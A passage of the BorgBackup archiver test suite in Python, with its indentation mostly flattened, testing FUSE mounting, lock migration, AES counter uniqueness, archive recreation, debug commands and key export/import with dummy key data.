def test_break_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('break-lock', self.repository_location)
def test_usage(self):
self.cmd()
self.cmd('-h')
def test_help(self):
assert 'Borg' in self.cmd('help')
assert 'patterns' in self.cmd('help', 'patterns')
assert 'Initialize' in self.cmd('help', 'init')
assert 'positional arguments' not in self.cmd('help', 'init', '--epilog-only')
assert 'This command initializes' not in self.cmd('help', 'init', '--usage-only')
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse(self):
def has_noatime(some_file):
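# return True only if O_NOATIME opens are permitted here and really keep atime unchanged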
atime_before = os.stat(some_file).st_atime_ns
try:
os.close(os.open(some_file, flags_noatime))
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_test_files()
have_noatime = has_noatime('input/file1')
self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive', 'input')
self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive2', 'input')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
os.remove(os.path.join('input', 'flagfile'))
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in archivename subdirs of mountpoint:
with self.fuse_mount(self.repository_location, mountpoint):
# flags are not supported by the FUSE mount
# we also ignore xattrs here, they are tested separately
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive', 'input'),
ignore_flags=True, ignore_xattrs=True)
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive2', 'input'),
ignore_flags=True, ignore_xattrs=True)
# mount only 1 archive, its contents shall show up directly in mountpoint:
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'input'),
ignore_flags=True, ignore_xattrs=True)
# regular file
in_fn = 'input/file1'
out_fn = os.path.join(mountpoint, 'input', 'file1')
# stat
sti1 = os.stat(in_fn)
sto1 = os.stat(out_fn)
assert sti1.st_mode == sto1.st_mode
assert sti1.st_uid == sto1.st_uid
assert sti1.st_gid == sto1.st_gid
assert sti1.st_size == sto1.st_size
if have_noatime:
assert sti1.st_atime == sto1.st_atime
assert sti1.st_ctime == sto1.st_ctime
assert sti1.st_mtime == sto1.st_mtime
if are_hardlinks_supported():
# note: there is another hardlink to this, see below
assert sti1.st_nlink == sto1.st_nlink == 2
# read
with open(in_fn, 'rb') as in_f, open(out_fn, 'rb') as out_f:
assert in_f.read() == out_f.read()
# hardlink (to 'input/file1')
if are_hardlinks_supported():
in_fn = 'input/hardlink'
out_fn = os.path.join(mountpoint, 'input', 'hardlink')
sti2 = os.stat(in_fn)
sto2 = os.stat(out_fn)
assert sti2.st_nlink == sto2.st_nlink == 2
assert sto1.st_ino == sto2.st_ino
# symlink
if are_symlinks_supported():
in_fn = 'input/link1'
out_fn = os.path.join(mountpoint, 'input', 'link1')
sti = os.stat(in_fn, follow_symlinks=False)
sto = os.stat(out_fn, follow_symlinks=False)
assert sti.st_size == len('somewhere')
assert sto.st_size == len('somewhere')
assert stat.S_ISLNK(sti.st_mode)
assert stat.S_ISLNK(sto.st_mode)
assert os.readlink(in_fn) == os.readlink(out_fn)
# FIFO
if are_fifos_supported():
out_fn = os.path.join(mountpoint, 'input', 'fifo1')
sto = os.stat(out_fn)
assert stat.S_ISFIFO(sto.st_mode)
# list/read xattrs
try:
in_fn = 'input/fusexattr'
out_fn = os.fsencode(os.path.join(mountpoint, 'input', 'fusexattr'))
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
assert sorted(no_selinux(xattr.listxattr(out_fn))) == [b'user.empty', b'user.foo', ]
assert xattr.getxattr(out_fn, b'user.foo') == b'bar'
assert xattr.getxattr(out_fn, b'user.empty') == b''
else:
assert no_selinux(xattr.listxattr(out_fn)) == []
try:
xattr.getxattr(out_fn, b'user.foo')
except OSError as e:
assert e.errno == llfuse.ENOATTR
else:
assert False, "expected OSError(ENOATTR), but no error was raised"
except OSError as err:
if sys.platform.startswith(('nothing_here_now', )) and err.errno == errno.ENOTSUP:
# some systems have no xattr support on FUSE
pass
else:
raise
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_versions_view(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('test', contents=b'first')
if are_hardlinks_supported():
self.create_regular_file('hardlink1', contents=b'123456')
os.link('input/hardlink1', 'input/hardlink2')
os.link('input/hardlink1', 'input/hardlink3')
self.cmd('create', self.repository_location + '::archive1', 'input')
self.create_regular_file('test', contents=b'second')
self.cmd('create', self.repository_location + '::archive2', 'input')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# mount the whole repository, archive contents shall show up in versioned view:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions'):
path = os.path.join(mountpoint, 'input', 'test') # filename shows up as directory ...
files = os.listdir(path)
assert all(f.startswith('test.') for f in files) # ... with files test.xxxxx in there
assert {b'first', b'second'} == {open(os.path.join(path, f), 'rb').read() for f in files}
if are_hardlinks_supported():
hl1 = os.path.join(mountpoint, 'input', 'hardlink1', 'hardlink1.00001')
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl1).st_ino == os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
# similar again, but exclude the hardlink master:
with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions', '-e', 'input/hardlink1'):
if are_hardlinks_supported():
hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
assert os.stat(hl2).st_ino == os.stat(hl3).st_ino
assert open(hl3, 'rb').read() == b'123456'
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_allow_damaged_files(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive')
# Get rid of a chunk and repair it
archive, repository = self.open_archive('archive')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
repository.delete(item.chunks[-1].id)
path = item.path # store full path for later
break
else:
assert False # missed the file
repository.commit(compact=False)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location + '::archive', mountpoint):
with pytest.raises(OSError) as excinfo:
open(os.path.join(mountpoint, path))
assert excinfo.value.errno == errno.EIO
with self.fuse_mount(self.repository_location + '::archive', mountpoint, '-o', 'allow_damaged_files'):
open(os.path.join(mountpoint, path)).close()
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_mount_options(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('arch11')
self.create_src_archive('arch12')
self.create_src_archive('arch21')
self.create_src_archive('arch22')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
with self.fuse_mount(self.repository_location, mountpoint, '--first=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--last=2', '--sort=name'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch1'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch2'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch'):
assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12', 'arch21', 'arch22']
with self.fuse_mount(self.repository_location, mountpoint, '--prefix=nope'):
assert sorted(os.listdir(os.path.join(mountpoint))) == []
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_migrate_lock_alive(self):
"""Both old_id and new_id must not be stale during lock migration / daemonization."""
from functools import wraps
import pickle
import traceback
# Check results are communicated from the borg mount background process
# to the pytest process by means of a serialized dict object stored in this file.
assert_data_file = os.path.join(self.tmpdir, 'migrate_lock_assert_data.pickle')
# Decorates Lock.migrate_lock() with process_alive() checks before and after.
# (We don't want to mix testing code into runtime.)
def write_assert_data(migrate_lock):
@wraps(migrate_lock)
def wrapper(self, old_id, new_id):
wrapper.num_calls += 1
assert_data = {
'num_calls': wrapper.num_calls,
'old_id': old_id,
'new_id': new_id,
'before': {
'old_id_alive': platform.process_alive(*old_id),
'new_id_alive': platform.process_alive(*new_id)},
'exception': None,
'exception.extr_tb': None,
'after': {
'old_id_alive': None,
'new_id_alive': None}}
try:
with open(assert_data_file, 'wb') as _out:
pickle.dump(assert_data, _out)
except:
pass
try:
return migrate_lock(self, old_id, new_id)
except BaseException as e:
assert_data['exception'] = e
assert_data['exception.extr_tb'] = traceback.extract_tb(e.__traceback__)
finally:
assert_data['after'].update({
'old_id_alive': platform.process_alive(*old_id),
'new_id_alive': platform.process_alive(*new_id)})
try:
with open(assert_data_file, 'wb') as _out:
pickle.dump(assert_data, _out)
except:
pass
wrapper.num_calls = 0
return wrapper
# Decorate
borg.locking.Lock.migrate_lock = write_assert_data(borg.locking.Lock.migrate_lock)
try:
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('arch')
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# In order that the decoration is kept for the borg mount process, we must not spawn, but actually fork;
# not to be confused with the forking in borg.helpers.daemonize() which is done as well.
with self.fuse_mount(self.repository_location, mountpoint, os_fork=True):
pass
with open(assert_data_file, 'rb') as _in:
assert_data = pickle.load(_in)
print('\nLock.migrate_lock(): assert_data = %r.' % (assert_data, ), file=sys.stderr, flush=True)
exception = assert_data['exception']
if exception is not None:
extracted_tb = assert_data['exception.extr_tb']
print(
'Lock.migrate_lock() raised an exception:\n',
'Traceback (most recent call last):\n',
*traceback.format_list(extracted_tb),
*traceback.format_exception(exception.__class__, exception, None),
sep='', end='', file=sys.stderr, flush=True)
assert assert_data['num_calls'] == 1, "Lock.migrate_lock() must be called exactly once."
assert exception is None, "Lock.migrate_lock() may not raise an exception."
assert_data_before = assert_data['before']
assert assert_data_before['old_id_alive'], "old_id must be alive (=must not be stale) when calling Lock.migrate_lock()."
assert assert_data_before['new_id_alive'], "new_id must be alive (=must not be stale) when calling Lock.migrate_lock()."
assert_data_after = assert_data['after']
assert assert_data_after['old_id_alive'], "old_id must be alive (=must not be stale) when Lock.migrate_lock() has returned."
assert assert_data_after['new_id_alive'], "new_id must be alive (=must not be stale) when Lock.migrate_lock() has returned."
finally:
# Undecorate
borg.locking.Lock.migrate_lock = borg.locking.Lock.migrate_lock.__wrapped__
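# Helper: ensure AES CTR counter values are never reused - for each new chunk in the
# repository, all counter values derived from its nonce must not have been used before.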
def verify_aes_counter_uniqueness(self, method):
seen = set() # Chunks already seen
used = set() # counter values already used
def verify_uniqueness():
with Repository(self.repository_path) as repository:
for id, _ in repository.open_index(repository.get_transaction_id()).iteritems():
data = repository.get(id)
hash = sha256(data).digest()
if hash not in seen:
seen.add(hash)
num_blocks = num_cipher_blocks(len(data) - 41)
nonce = bytes_to_long(data[33:41])
for counter in range(nonce, nonce + num_blocks):
self.assert_not_in(counter, used)
used.add(counter)
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=' + method, self.repository_location)
verify_uniqueness()
self.cmd('create', self.repository_location + '::test', 'input')
verify_uniqueness()
self.cmd('create', self.repository_location + '::test.2', 'input')
verify_uniqueness()
self.cmd('delete', self.repository_location + '::test.2')
verify_uniqueness()
def test_aes_counter_uniqueness_keyfile(self):
self.verify_aes_counter_uniqueness('keyfile')
def test_aes_counter_uniqueness_passphrase(self):
self.verify_aes_counter_uniqueness('repokey')
def test_debug_dump_archive_items(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-archive-items', self.repository_location + '::test')
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('000000_')
assert 'Done.' in output
def test_debug_dump_repo_objs(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('debug', 'dump-repo-objs', self.repository_location)
output_dir = sorted(os.listdir('output'))
assert len(output_dir) > 0 and output_dir[0].startswith('00000000_')
assert 'Done.' in output
def test_debug_put_get_delete_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
data = b'some data'
hexkey = sha256(data).hexdigest()
self.create_regular_file('file', contents=data)
output = self.cmd('debug', 'put-obj', self.repository_location, 'input/file')
assert hexkey in output
output = self.cmd('debug', 'get-obj', self.repository_location, hexkey, 'output/file')
assert hexkey in output
with open('output/file', 'rb') as f:
data_read = f.read()
assert data == data_read
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "deleted" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
assert "not found" in output
output = self.cmd('debug', 'delete-obj', self.repository_location, 'invalid')
assert "is invalid" in output
def test_init_interrupt(self):
def raise_eof(*args):
raise EOFError
with patch.object(KeyfileKeyBase, 'create', raise_eof):
self.cmd('init', '--encryption=repokey', self.repository_location, exit_code=1)
assert not os.path.exists(self.repository_location)
def test_init_requires_encryption_option(self):
self.cmd('init', self.repository_location, exit_code=2)
def test_init_nested_repositories(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested', exit_code=2)
else:
with pytest.raises(Repository.AlreadyExists):
self.cmd('init', '--encryption=repokey', self.repository_location + '/nested')
def check_cache(self):
# First run a regular borg check
self.cmd('check', self.repository_location)
# Then check that the cache on disk matches exactly what's in the repo.
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
original_chunks = cache.chunks
Cache.destroy(repository)
with Cache(repository, key, manifest) as cache:
correct_chunks = cache.chunks
assert original_chunks is not correct_chunks
seen = set()
for id, (refcount, size, csize) in correct_chunks.iteritems():
o_refcount, o_size, o_csize = original_chunks[id]
assert refcount == o_refcount
assert size == o_size
assert csize == o_csize
seen.add(id)
for id, (refcount, size, csize) in original_chunks.iteritems():
assert id in seen
def test_check_cache(self):
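# corrupt the cache by incref'ing a chunk without a matching repository change,
# then expect check_cache() to detect the mismatch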
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with self.open_repository() as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest, sync=False) as cache:
cache.begin_txn()
cache.chunks.incref(list(cache.chunks.iteritems())[0][0])
cache.commit()
with pytest.raises(AssertionError):
self.check_cache()
def test_recreate_target_rc(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('recreate', self.repository_location, '--target=asdf', exit_code=2)
assert 'Need to specify single archive' in output
def test_recreate_target(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.check_cache()
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.check_cache()
original_archive = self.cmd('list', self.repository_location)
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3', '--target=new-archive')
self.check_cache()
archives = self.cmd('list', self.repository_location)
assert original_archive in archives
assert 'new-archive' in archives
archive = self.repository_location + '::new-archive'
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
def test_recreate_basic(self):
self.create_test_files()
self.create_regular_file('dir2/file3', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', archive, 'input/dir2', '-e', 'input/dir2/file3')
self.check_cache()
listing = self.cmd('list', '--short', archive)
assert 'file1' not in listing
assert 'dir2/file2' in listing
assert 'dir2/file3' not in listing
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_subtree_hardlinks(self):
# This is essentially the same problem set as in test_extract_hardlinks
self._extract_hardlinks_setup()
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('recreate', self.repository_location + '::test', 'input/dir1')
self.check_cache()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
assert os.stat('input/dir1/hardlink').st_nlink == 4
def test_recreate_rechunkify(self):
with open(os.path.join(self.input_path, 'large_file'), 'wb') as fd:
fd.write(b'a' * 280)
fd.write(b'b' * 280)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--chunker-params', '7,9,8,128', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input', '--files-cache=disabled')
file_list = self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{num_chunks} {unique_chunks}')
num_chunks, unique_chunks = map(int, file_list.split(' '))
# test1 and test2 do not deduplicate
assert num_chunks == unique_chunks
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
# test1 and test2 do deduplicate after recreate
assert int(self.cmd('list', self.repository_location + '::test1', 'input/large_file', '--format={size}'))
assert not int(self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{unique_chunks}'))
def test_recreate_recompress(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '-C', 'none')
file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_before = file_list.split(' ')
assert int(csize) >= int(size) # >= due to metadata overhead
self.cmd('recreate', self.repository_location, '-C', 'lz4', '--recompress')
self.check_cache()
file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_after = file_list.split(' ')
assert int(csize) < int(size)
assert sha256_before == sha256_after
def test_recreate_timestamp(self):
local_timezone = datetime.now(timezone(timedelta(0))).astimezone().tzinfo
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', '--timestamp', "1970-01-02T00:00:00", '--comment',
'test', archive)
info = self.cmd('info', archive).splitlines()
dtime = datetime(1970, 1, 2) + local_timezone.utcoffset(None)
s_time = dtime.strftime("%Y-%m-%d")
assert any([re.search(r'Time \(start\).+ %s' % s_time, item) for item in info])
assert any([re.search(r'Time \(end\).+ %s' % s_time, item) for item in info])
def test_recreate_dry_run(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
archives_before = self.cmd('list', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '-n', '-e', 'input/compressible')
self.check_cache()
archives_after = self.cmd('list', self.repository_location + '::test')
assert archives_after == archives_before
def test_recreate_skips_nothing_to_do(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_before = self.cmd('info', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
info_after = self.cmd('info', self.repository_location + '::test')
assert info_before == info_after # includes archive ID
def test_with_lock(self):
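# the child process exits with 42 if the exclusive lock file exists while it runs,
# proving that 'with-lock' holds the repository lock around the wrapped command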
self.cmd('init', '--encryption=repokey', self.repository_location)
lock_path = os.path.join(self.repository_path, 'lock.exclusive')
cmd = 'python3', '-c', 'import os, sys; sys.exit(42 if os.path.exists("%s") else 23)' % lock_path
self.cmd('with-lock', self.repository_location, *cmd, fork=True, exit_code=42)
def test_recreate_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=0)
self.create_regular_file('file2', size=0)
self.create_regular_file('file3', size=0)
self.create_regular_file('file4', size=0)
self.create_regular_file('file5', size=0)
self.cmd('create', self.repository_location + '::test', 'input')
output = self.cmd('recreate', '--list', '--info', self.repository_location + '::test', '-e', 'input/file2')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file2", output)
output = self.cmd('recreate', '--list', self.repository_location + '::test', '-e', 'input/file3')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file3", output)
output = self.cmd('recreate', self.repository_location + '::test', '-e', 'input/file4')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file4", output)
output = self.cmd('recreate', '--info', self.repository_location + '::test', '-e', 'input/file5')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file5", output)
def test_bad_filters(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('delete', '--first', '1', '--last', '1', self.repository_location, fork=True, exit_code=2)
def test_key_export_keyfile(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'r') as fd:
key_contents = fd.read()
assert key_contents == export_contents
os.unlink(key_file)
self.cmd('key', 'import', self.repository_location, export_file)
with open(key_file, 'r') as fd:
key_contents2 = fd.read()
assert key_contents2 == key_contents
def test_key_import_keyfile_with_borg_key_file(self):
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
exported_key_file = os.path.join(self.output_path, 'exported')
self.cmd('key', 'export', self.repository_location, exported_key_file)
key_file = os.path.join(self.keys_path, os.listdir(self.keys_path)[0])
with open(key_file, 'r') as fd:
key_contents = fd.read()
os.unlink(key_file)
imported_key_file = os.path.join(self.output_path, 'imported')
with environment_variable(BORG_KEY_FILE=imported_key_file):
self.cmd('key', 'import', self.repository_location, exported_key_file)
assert not os.path.isfile(key_file), '"borg key import" should respect BORG_KEY_FILE'
with open(imported_key_file, 'r') as fd:
imported_key_contents = fd.read()
assert imported_key_contents == key_contents
def test_key_export_repokey(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
with Repository(self.repository_path) as repository:
repo_key = RepoKey(repository)
repo_key.load(None, Passphrase.env_passphrase())
backup_key = KeyfileKey(key.TestKey.MockRepository())
backup_key.load(export_file, Passphrase.env_passphrase())
assert repo_key.enc_key == backup_key.enc_key
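        # blank out the key stored in the repository, so the following "key import"
        # really has to restore it from the exported file: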
with Repository(self.repository_path) as repository:
repository.save_key(b'')
self.cmd('key', 'import', self.repository_location, export_file)
with Repository(self.repository_path) as repository:
repo_key2 = RepoKey(repository)
repo_key2.load(None, Passphrase.env_passphrase())
            assert repo_key2.enc_key == repo_key.enc_key
def test_key_export_qr(self):
export_file = self.output_path + '/exported.html'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', '--qr-html', self.repository_location, export_file)
with open(export_file, 'r', encoding='utf-8') as fd:
export_contents = fd.read()
assert bin_to_hex(repo_id) in export_contents
assert export_contents.startswith('<!doctype html>')
assert export_contents.endswith('</html>\n')
def test_key_export_directory(self):
export_directory = self.output_path + '/exported'
os.mkdir(export_directory)
self.cmd('init', self.repository_location, '--encryption', 'repokey')
self.cmd('key', 'export', self.repository_location, export_directory, exit_code=EXIT_ERROR)
def test_key_import_errors(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self.cmd('key', 'import', self.repository_location, export_file, exit_code=EXIT_ERROR)
with open(export_file, 'w') as fd:
fd.write('something not a key\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(NotABorgKeyFile):
self.cmd('key', 'import', self.repository_location, export_file)
with open(export_file, 'w') as fd:
fd.write('BORG_KEY a0a0a0\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(RepoIdMismatch):
self.cmd('key', 'import', self.repository_location, export_file)
def test_key_export_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
self.cmd('key', 'export', '--paper', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents == """To restore key use borg key import --paper /path/to/repo
BORG PAPER KEY v1
id: 2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02
1: 616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d
2: 737475 - 88
"""
def test_key_import_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
typed_input = (
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 02\n' # Forgot to type "-"
b'2 / e29442 3506da 4e1ea7 25f62a 5a3d41 - 02\n' # Forgot to type second "/"
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d42 - 02\n' # Typo (..42 not ..41)
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n' # Correct! Congratulations
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'\n\n' # Abort [yN] => N
b'737475 88\n' # missing "-"
b'73747i - 88\n' # typo
b'73747 - 88\n' # missing nibble
b'73 74 75 - 89\n' # line checksum mismatch
b'00a1 - 88\n' # line hash collision - overall hash mismatch, have to start over
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'73 74 75 - 88\n'
)
# In case that this has to change, here is a quick way to find a colliding line hash:
#
# from hashlib import sha256
# hash_fn = lambda x: sha256(b'\x00\x02' + x).hexdigest()[:2]
# for i in range(1000):
# if hash_fn(i.to_bytes(2, byteorder='big')) == '88': # 88 = line hash
# print(i.to_bytes(2, 'big'))
# break
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
# Test abort paths
typed_input = b'\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
typed_input = b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
def test_debug_dump_manifest(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-manifest', self.repository_location, dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert 'archives' in result
assert 'config' in result
assert 'item_keys' in result
assert 'timestamp' in result
assert 'version' in result
def test_debug_dump_archive(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-archive', self.repository_location + "::test", dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert '_name' in result
assert '_manifest_entry' in result
assert '_meta' in result
assert '_items' in result
def test_debug_refcount_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('debug', 'refcount-obj', self.repository_location, '0' * 64).strip()
assert output == 'object 0000000000000000000000000000000000000000000000000000000000000000 not found [info from chunks cache].'
create_json = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
archive_id = create_json['archive']['id']
output = self.cmd('debug', 'refcount-obj', self.repository_location, archive_id).strip()
assert output == 'object ' + archive_id + ' has 1 referrers [info from chunks cache].'
# Invalid IDs do not abort or return an error
output = self.cmd('debug', 'refcount-obj', self.repository_location, '124', 'xyza').strip()
assert output == 'object id 124 is invalid.\nobject id xyza is invalid.'
def test_debug_info(self):
output = self.cmd('debug', 'info')
assert 'CRC implementation' in output
assert 'Python' in output
def test_benchmark_crud(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
with environment_variable(_BORG_BENCHMARK_CRUD_TEST='YES'):
self.cmd('benchmark', 'crud', self.repository_location, self.input_path)
def test_config(self):
self.create_test_files()
os.unlink('input/flagfile')
